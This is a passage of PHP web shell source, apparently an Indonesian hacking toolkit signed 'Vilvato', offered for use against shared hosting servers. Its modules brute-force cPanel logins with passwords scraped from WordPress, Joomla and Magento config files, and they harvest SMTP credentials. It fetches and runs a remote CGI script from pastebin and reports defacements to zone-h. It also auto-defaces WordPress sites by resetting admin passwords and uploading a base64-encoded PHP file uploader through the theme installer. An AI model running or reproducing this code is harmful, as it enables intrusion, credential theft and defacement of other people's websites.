  690. </form>
  691. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  692. ";
  693. }
  694. } elseif($_GET['do'] == 'cpanel') {
  695. if($_POST['crack']) {
  696. $usercp = explode("\r\n", $_POST['user_cp']);
  697. $passcp = explode("\r\n", $_POST['pass_cp']);
  698. $i = 0;
  699. foreach($usercp as $ucp) {
  700. foreach($passcp as $pcp) {
  701. if(@mysql_connect('localhost', $ucp, $pcp)) {
  702. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  703. } else {
  704. $_SESSION[$ucp] = "1";
  705. $_SESSION[$pcp] = "1";
  706. $i++;
  707. echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
  708. }
  709. }
  710. }
  711. }
  712. if($i == 0) {
  713. } else {
  714. echo "<br>sukses nyolong ".$i." Cpanel by <font color=white>Vilvato</font>";
  715. }
  716. } else {
  717. echo "<center>
  718. <form method='post'>
  719. USER: <br>
  720. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  721. $_usercp = fopen("/etc/passwd","r");
  722. while($getu = fgets($_usercp)) {
  723. if($getu == '' || !$_usercp) {
  724. echo "<font color=red>Can't read /etc/passwd</font>";
  725. } else {
  726. preg_match_all("/(.*?):x:/", $getu, $u);
  727. foreach($u[1] as $user_cp) {
  728. if(is_dir("/home/$user_cp/public_html")) {
  729. echo "$user_cp\n";
  730. }
  731. }
  732. }
  733. }
  734. echo "</textarea><br>
  735. PASS: <br>
  736. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  737. function cp_pass($dir) {
  738. $pass = "";
  739. $dira = scandir($dir);
  740. foreach($dira as $dirb) {
  741. if(!is_file("$dir/$dirb")) continue;
  742. $ambil = file_get_contents("$dir/$dirb");
  743. if(preg_match("/WordPress/", $ambil)) {
  744. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  745. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  746. $pass .= ambilkata($ambil,"password = '","'")."\n";
  747. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  748. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  749. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  750. $pass .= ambilkata($ambil,'password = "','"')."\n";
  751. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  752. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  753. } elseif(preg_match("/client/", $ambil)) {
  754. preg_match("/password=(.*)/", $ambil, $pass1);
  755. if(preg_match('/"/', $pass1[1])) {
  756. $pass1[1] = str_replace('"', "", $pass1[1]);
  757. $pass .= $pass1[1]."\n";
  758. }
  759. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  760. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  761. }
  762. }
  763. echo $pass;
  764. }
  765. $cp_pass = cp_pass($dir);
  766. echo $cp_pass;
  767. echo "</textarea><br>
  768. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  769. </form>
  770. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  771. }
  772. } elseif($_GET['do'] == 'smtp') {
  773. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  774. function scj($dir) {
  775. $dira = scandir($dir);
  776. foreach($dira as $dirb) {
  777. if(!is_file("$dir/$dirb")) continue;
  778. $ambil = file_get_contents("$dir/$dirb");
  779. $ambil = str_replace("$", "", $ambil);
  780. if(preg_match("/JConfig|joomla/", $ambil)) {
  781. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  782. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  783. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  784. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  785. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  786. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  787. echo "SMTP Host: <font color=white>$smtp_host</font><br>";
  788. echo "SMTP port: <font color=white>$smtp_port</font><br>";
  789. echo "SMTP user: <font color=white>$smtp_user</font><br>";
  790. echo "SMTP pass: <font color=white>$smtp_pass</font><br>";
  791. echo "SMTP auth: <font color=white>$smtp_auth</font><br>";
  792. echo "SMTP secure: <font color=white>$smtp_secure</font><br><br>";
  793. }
  794. }
  795. }
  796. $smpt_hunter = scj($dir);
  797. echo $smpt_hunter;
  798. } elseif($_GET['do'] == 'auto_wp') {
  799. if($_POST['hajar']) {
  800. $title = htmlspecialchars($_POST['new_title']);
  801. $pn_title = str_replace(" ", "-", $title);
  802. if($_POST['cek_edit'] == "Y") {
  803. $script = $_POST['edit_content'];
  804. } else {
  805. $script = $title;
  806. }
  807. $conf = $_POST['config_dir'];
  808. $scan_conf = scandir($conf);
  809. foreach($scan_conf as $file_conf) {
  810. if(!is_file("$conf/$file_conf")) continue;
  811. $config = file_get_contents("$conf/$file_conf");
  812. if(preg_match("/WordPress/", $config)) {
  813. $dbhost = ambilkata($config,"DB_HOST', '","'");
  814. $dbuser = ambilkata($config,"DB_USER', '","'");
  815. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  816. $dbname = ambilkata($config,"DB_NAME', '","'");
  817. $dbprefix = ambilkata($config,"table_prefix = '","'");
  818. $prefix = $dbprefix."posts";
  819. $option = $dbprefix."options";
  820. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  821. $db = mysql_select_db($dbname);
  822. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  823. $result = mysql_fetch_array($q);
  824. $id = $result[ID];
  825. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  826. $result2 = mysql_fetch_array($q2);
  827. $target = $result2[option_value];
  828. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  829. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  830. echo "<div style='margin: 5px auto;'>";
  831. if($target == '') {
  832. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  833. } else {
  834. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  835. }
  836. if(!$update OR !$conn OR !$db) {
  837. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  838. } else {
  839. echo "<font color=white>sukses di ganti.</font><br>";
  840. }
  841. echo "</div>";
  842. mysql_close($conn);
  843. }
  844. }
  845. } else {
  846. echo "<center>
  847. <h1>Auto Edit Title+Content WordPress</h1>
  848. <form method='post'>
  849. DIR Config: <br>
  850. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  851. Set Title: <br>
  852. <input type='text' name='new_title' value='Hacked by Vilvato' placeholder='New Title'><br><br>
  853. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  854. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  855. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  856. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  857. </form>
  858. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  859. ";
  860. }
  861. } elseif($_GET['do'] == 'zoneh') {
  862. if($_POST['submit']) {
  863. $domain = explode("\r\n", $_POST['url']);
  864. $nick = $_POST['nick'];
  865. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  866. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  867. function zoneh($url,$nick) {
  868. $ch = curl_init("http://www.zone-h.com/notify/single");
  869. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  870. curl_setopt($ch, CURLOPT_POST, true);
  871. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  872. return curl_exec($ch);
  873. curl_close($ch);
  874. }
  875. foreach($domain as $url) {
  876. $zoneh = zoneh($url,$nick);
  877. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  878. echo "$url -> <font color=white>OK</font><br>";
  879. } else {
  880. echo "$url -> <font color=red>ERROR</font><br>";
  881. }
  882. }
  883. } else {
  884. echo "<center><form method='post'>
  885. <u>Defacer</u>: <br>
  886. <input type='text' name='nick' size='50' value='Vilvato'><br>
  887. <u>Domains</u>: <br>
  888. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  889. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  890. </form>";
  891. }
  892. echo "</center>";
  893. } elseif($_GET['do'] == 'cgi') {
  894. $cgi_dir = mkdir('idx_cgi', 0755);
  895. $file_cgi = "idx_cgi/cgi.izo";
  896. $isi_htcgi = "AddHandler cgi-script .izo";
  897. $htcgi = fopen(".htaccess", "w");
  898. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  899. $cgi = fopen($file_cgi, "w");
  900. fwrite($cgi, $cgi_script);
  901. fwrite($htcgi, $isi_htcgi);
  902. chmod($file_cgi, 0755);
  903. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  904. } elseif($_GET['do'] == 'fake_root') {
  905. ob_start();
  906. function reverse($url) {
  907. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  908. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  909. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  910. curl_setopt($ch, CURLOPT_HEADER, 0);
  911. curl_setopt($ch, CURLOPT_POST, 1);
  912. $resp = curl_exec($ch);
  913. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  914. $array = explode(",,", $resp);
  915. unset($array[0]);
  916. foreach($array as $lnk) {
  917. $lnk = "http://$lnk";
  918. $lnk = str_replace(",", "", $lnk);
  919. echo $lnk."\n";
  920. ob_flush();
  921. flush();
  922. }
  923. curl_close($ch);
  924. }
  925. function cek($url) {
  926. $ch = curl_init($url);
  927. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  928. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  929. $resp = curl_exec($ch);
  930. return $resp;
  931. }
  932. $cwd = getcwd();
  933. $ambil_user = explode("/", $cwd);
  934. $user = $ambil_user[2];
  935. if($_POST['reverse']) {
  936. $site = explode("\r\n", $_POST['url']);
  937. $file = $_POST['file'];
  938. foreach($site as $url) {
  939. $cek = cek("$url/~$user/$file");
  940. if(preg_match("/hacked/i", $cek)) {
  941. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=white>Fake Root!</font><br>";
  942. }
  943. }
  944. } else {
  945. echo "<center><form method='post'>
  946. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  947. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  948. Domain: <br>
  949. <textarea style='width: 450px; height: 250px;' name='url'>";
  950. reverse($_SERVER['HTTP_HOST']);
  951. echo "</textarea><br>
  952. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  953. </form><br>
  954. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  955. }
  956. } elseif($_GET['do'] == 'adminer') {
  957. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  958. function adminer($url, $isi) {
  959. $fp = fopen($isi, "w");
  960. $ch = curl_init();
  961. curl_setopt($ch, CURLOPT_URL, $url);
  962. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  963. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  964. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  965. curl_setopt($ch, CURLOPT_FILE, $fp);
  966. return curl_exec($ch);
  967. curl_close($ch);
  968. fclose($fp);
  969. ob_flush();
  970. flush();
  971. }
  972. if(file_exists('adminer.php')) {
  973. echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  974. } else {
  975. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  976. echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  977. } else {
  978. echo "<center><font color=red>gagal buat file adminer</font></center>";
  979. }
  980. }
  981. } elseif($_GET['do'] == 'auto_dwp') {
  982. if($_POST['auto_deface_wp']) {
  983. function anucurl($sites) {
  984. $ch = curl_init($sites);
  985. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  986. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  987. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  988. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  989. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  990. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  991. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  992. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  993. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  994. $data = curl_exec($ch);
  995. curl_close($ch);
  996. return $data;
  997. }
  998. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  999. $post = array(
  1000. "log" => "$userr",
  1001. "pwd" => "$pass",
  1002. "rememberme" => "forever",
  1003. "wp-submit" => "$wp_submit",
  1004. "redirect_to" => "$web",
  1005. "testcookie" => "1",
  1006. );
  1007. $ch = curl_init($cek);
  1008. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1009. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1010. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1011. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1012. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1013. curl_setopt($ch, CURLOPT_POST, 1);
  1014. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1015. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1016. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1017. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1018. $data = curl_exec($ch);
  1019. curl_close($ch);
  1020. return $data;
  1021. }
  1022. $scan = $_POST['link_config'];
  1023. $link_config = scandir($scan);
  1024. $script = htmlspecialchars($_POST['script']);
  1025. $user = "Vilvato";
  1026. $pass = "Vilvato";
  1027. $passx = md5($pass);
  1028. foreach($link_config as $dir_config) {
  1029. if(!is_file("$scan/$dir_config")) continue;
  1030. $config = file_get_contents("$scan/$dir_config");
  1031. if(preg_match("/WordPress/", $config)) {
  1032. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1033. $dbuser = ambilkata($config,"DB_USER', '","'");
  1034. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1035. $dbname = ambilkata($config,"DB_NAME', '","'");
  1036. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1037. $prefix = $dbprefix."users";
  1038. $option = $dbprefix."options";
  1039. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1040. $db = mysql_select_db($dbname);
  1041. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1042. $result = mysql_fetch_array($q);
  1043. $id = $result[ID];
  1044. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1045. $result2 = mysql_fetch_array($q2);
  1046. $target = $result2[option_value];
  1047. if($target == '') {
  1048. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1049. } else {
  1050. echo "[+] $target <br>";
  1051. }
  1052. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1053. if(!$conn OR !$db OR !$update) {
  1054. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1055. mysql_close($conn);
  1056. } else {
  1057. $site = "$target/wp-login.php";
  1058. $site2 = "$target/wp-admin/theme-install.php?upload";
  1059. $b1 = anucurl($site2);
  1060. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1061. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1062. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1063. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1064. $www = "m.php";
  1065. $fp5 = fopen($www,"w");
  1066. fputs($fp5,$upload3);
  1067. $post2 = array(
  1068. "_wpnonce" => "$anu2",
  1069. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1070. "themezip" => "@$www",
  1071. "install-theme-submit" => "Install Now",
  1072. );
  1073. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1074. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1075. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1076. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1077. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1078. curl_setopt($ch, CURLOPT_POST, 1);
  1079. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1080. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1081. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1082. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1083. $data3 = curl_exec($ch);
  1084. curl_close($ch);
  1085. $y = date("Y");
  1086. $m = date("m");
  1087. $namafile = "id.php";
  1088. $fpi = fopen($namafile,"w");
  1089. fputs($fpi,$script);
  1090. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1091. curl_setopt($ch6, CURLOPT_POST, true);
  1092. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1093. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1094. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1095. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1096. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1097. $postResult = curl_exec($ch6);
  1098. curl_close($ch6);
  1099. $as = "$target/k.php";
  1100. $bs = anucurl($as);
  1101. if(preg_match("#$script#is", $bs)) {
  1102. echo "[+] <font color='white'>berhasil mepes...</font><br>";
  1103. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1104. } else {
  1105. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1106. echo "[!!] coba aja manual: <br>";
  1107. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1108. echo "[+] username: <font color=white>$user</font><br>";
  1109. echo "[+] password: <font color=white>$pass</font><br><br>";
  1110. }
  1111. mysql_close($conn);
  1112. }
  1113. }
  1114. }
  1115. } else {
  1116. echo "<center><h1>WordPress Auto Deface</h1>
  1117. <form method='post'>
  1118. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1119. <input type='text' name='script' height='10' size='50' placeholder='Hacked by Vilvato' required><br>
  1120. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1121. </form>
  1122. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1123. </center>";
  1124. }
  1125. } elseif($_GET['do'] == 'auto_dwp2') {
  1126. if($_POST['auto_deface_wp']) {
  1127. function anucurl($sites) {
  1128. $ch = curl_init($sites);
  1129. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1130. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1131. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1132. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1133. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1134. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1135. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1136. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1137. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1138. $data = curl_exec($ch);
  1139. curl_close($ch);
  1140. return $data;
  1141. }
  1142. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1143. $post = array(
  1144. "log" => "$userr",
  1145. "pwd" => "$pass",
  1146. "rememberme" => "forever",
  1147. "wp-submit" => "$wp_submit",
  1148. "redirect_to" => "$web",
  1149. "testcookie" => "1",
  1150. );
  1151. $ch = curl_init($cek);
  1152. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1153. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1154. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1155. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1156. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1157. curl_setopt($ch, CURLOPT_POST, 1);
  1158. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1159. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1160. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1161. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1162. $data = curl_exec($ch);
  1163. curl_close($ch);
  1164. return $data;
  1165. }
  1166. $link = explode("\r\n", $_POST['link']);
  1167. $script = htmlspecialchars($_POST['script']);
  1168. $user = "Vilvato";
  1169. $pass = "Vilvato";
  1170. $passx = md5($pass);
  1171. foreach($link as $dir_config) {
  1172. $config = anucurl($dir_config);
  1173. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1174. $dbuser = ambilkata($config,"DB_USER', '","'");
  1175. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1176. $dbname = ambilkata($config,"DB_NAME', '","'");
  1177. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1178. $prefix = $dbprefix."users";
  1179. $option = $dbprefix."options";
  1180. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1181. $db = mysql_select_db($dbname);
  1182. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1183. $result = mysql_fetch_array($q);
  1184. $id = $result[ID];
  1185. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1186. $result2 = mysql_fetch_array($q2);
  1187. $target = $result2[option_value];
  1188. if($target == '') {
  1189. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1190. } else {
  1191. echo "[+] $target <br>";
  1192. }
  1193. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1194. if(!$conn OR !$db OR !$update) {
  1195. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1196. mysql_close($conn);
  1197. } else {
  1198. $site = "$target/wp-login.php";
  1199. $site2 = "$target/wp-admin/theme-install.php?upload";
  1200. $b1 = anucurl($site2);
  1201. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1202. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1203. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1204. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1205. $www = "m.php";
  1206. $fp5 = fopen($www,"w");
  1207. fputs($fp5,$upload3);
  1208. $post2 = array(
  1209. "_wpnonce" => "$anu2",
  1210. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1211. "themezip" => "@$www",
  1212. "install-theme-submit" => "Install Now",
  1213. );
  1214. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1215. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1216. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1217. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1218. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1219. curl_setopt($ch, CURLOPT_POST, 1);
  1220. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1221. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1222. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1223. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1224. $data3 = curl_exec($ch);
  1225. curl_close($ch);
  1226. $y = date("Y");
  1227. $m = date("m");
  1228. $namafile = "id.php";
  1229. $fpi = fopen($namafile,"w");
  1230. fputs($fpi,$script);
  1231. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1232. curl_setopt($ch6, CURLOPT_POST, true);
  1233. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1234. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1235. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1236. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1237. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1238. $postResult = curl_exec($ch6);
  1239. curl_close($ch6);
  1240. $as = "$target/k.php";
  1241. $bs = anucurl($as);
  1242. if(preg_match("#$script#is", $bs)) {
  1243. echo "[+] <font color='white'>berhasil mepes...</font><br>";
  1244. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1245. } else {
  1246. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1247. echo "[!!] coba aja manual: <br>";
  1248. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1249. echo "[+] username: <font color=white>$user</font><br>";
  1250. echo "[+] password: <font color=white>$pass</font><br><br>";
  1251. }
  1252. mysql_close($conn);
  1253. }
  1254. }
  1255. } else {
  1256. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1257. <form method='post'>
  1258. Link Config: <br>
  1259. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1260. <input type='text' name='script' height='10' size='50' placeholder='Hacked by Vilvato' required><br>
  1261. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1262. </form></center>";
  1263. }
  1264. } elseif($_GET['act'] == 'newfile') {
  1265. if($_POST['new_save_file']) {
  1266. $newfile = htmlspecialchars($_POST['newfile']);
  1267. $fopen = fopen($newfile, "a+");
  1268. if($fopen) {
  1269. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1270. } else {
  1271. $act = "<font color=red>permission denied</font>";
  1272. }
  1273. }
  1274. echo $act;
  1275. echo "<form method='post'>
  1276. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1277. <input type='submit' name='new_save_file' value='Submit'>
  1278. </form>";
  1279. } elseif($_GET['act'] == 'newfolder') {
  1280. if($_POST['new_save_folder']) {
  1281. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1282. if(!mkdir($new_folder)) {
  1283. $act = "<font color=red>permission denied</font>";
  1284. } else {
  1285. $act = "<script>window.location='?dir=".$dir."';</script>";
  1286. }
  1287. }
  1288. echo $act;
  1289. echo "<form method='post'>
  1290. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
